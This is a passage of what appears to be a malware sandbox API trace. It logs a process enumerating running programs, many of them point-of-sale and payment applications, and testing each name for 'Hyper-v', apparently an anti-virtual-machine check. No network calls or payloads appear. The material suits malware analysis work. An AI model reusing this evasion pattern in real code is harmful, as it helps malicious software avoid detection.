lpUsedDefaultChar=0x0) returned 11 [0102.574] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0102.574] StrStrIA (lpFirst="winscp.exe", lpSrch="Hyper-v") returned 0x0 [0102.574] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0102.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.575] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f700 [0102.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357f700, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0102.575] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0102.575] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="Hyper-v") returned 0x0 [0102.575] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0102.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0102.577] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f7a0 [0102.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357f7a0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0102.577] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0102.577] StrStrIA (lpFirst="active-charge.exe", lpSrch="Hyper-v") returned 0x0 [0102.577] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0102.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.578] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570a88 [0102.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3570a88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0102.578] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0102.578] StrStrIA (lpFirst="accupos.exe", lpSrch="Hyper-v") returned 0x0 [0102.578] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0102.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.579] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35707d0 [0102.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x35707d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0102.579] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0102.579] StrStrIA (lpFirst="afr38.exe", lpSrch="Hyper-v") returned 0x0 [0102.579] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0102.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.580] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570a70 [0102.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3570a70, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0102.580] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0102.581] StrStrIA (lpFirst="aldelo.exe", lpSrch="Hyper-v") returned 0x0 [0102.581] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0102.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0102.627] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3570848 [0102.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3570848, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0102.627] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0102.627] StrStrIA (lpFirst="ccv_server.exe", lpSrch="Hyper-v") returned 0x0 [0102.627] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0102.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0102.629] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357f580 [0102.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357f580, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0102.629] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0102.629] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="Hyper-v") returned 0x0 [0102.629] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0102.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0102.630] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f6c0 [0102.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357f6c0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0102.630] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0102.631] StrStrIA (lpFirst="creditservice.exe", lpSrch="Hyper-v") returned 0x0 [0102.631] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0102.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.632] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35707e8 [0102.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x35707e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0102.632] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0102.632] StrStrIA (lpFirst="edcsvr.exe", lpSrch="Hyper-v") returned 0x0 [0102.632] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0102.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0102.633] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3570a10 [0102.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3570a10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0102.633] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0102.633] StrStrIA (lpFirst="fpos.exe", lpSrch="Hyper-v") returned 0x0 [0102.634] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0102.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.635] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35707b8 [0102.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35707b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0102.635] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0102.635] StrStrIA (lpFirst="isspos.exe", lpSrch="Hyper-v") returned 0x0 [0102.635] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0102.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.636] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f800 [0102.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357f800, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0102.636] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0102.636] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="Hyper-v") returned 0x0 [0102.636] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0102.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.638] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570800 [0102.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3570800, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0102.638] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0102.638] StrStrIA (lpFirst="omnipos.exe", lpSrch="Hyper-v") returned 0x0 [0102.638] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0102.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.639] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570860 [0102.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3570860, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0102.639] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0102.639] StrStrIA (lpFirst="spcwin.exe", lpSrch="Hyper-v") returned 0x0 [0102.639] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0102.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.640] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357f6e0 [0102.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357f6e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0102.641] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0102.641] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="Hyper-v") returned 0x0 [0102.641] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0102.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0102.642] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3570878 [0102.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3570878, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0102.642] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0102.642] StrStrIA (lpFirst="utg2.exe", lpSrch="Hyper-v") returned 0x0 [0102.642] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0102.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.644] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35708a8 [0102.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x35708a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0102.644] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0102.644] StrStrIA (lpFirst="saying.exe", lpSrch="Hyper-v") returned 0x0 [0102.644] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0102.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0102.645] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3570ab8 [0102.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3570ab8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0102.646] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0102.646] StrStrIA (lpFirst="ripe.exe", lpSrch="Hyper-v") returned 0x0 [0102.646] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0102.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.647] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570c20 [0102.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3570c20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0102.647] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0102.647] StrStrIA (lpFirst="acoustic.exe", lpSrch="Hyper-v") returned 0x0 [0102.647] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0102.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0102.648] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3570bd8 [0102.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3570bd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0102.648] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0102.649] StrStrIA (lpFirst="mail.exe", lpSrch="Hyper-v") returned 0x0 [0102.649] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0102.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.650] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570d10 [0102.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3570d10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0102.650] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0102.650] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="Hyper-v") returned 0x0 [0102.650] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.651] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570d28 [0102.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570d28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.651] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.651] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.651] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0102.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.653] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570ad0 [0102.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3570ad0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 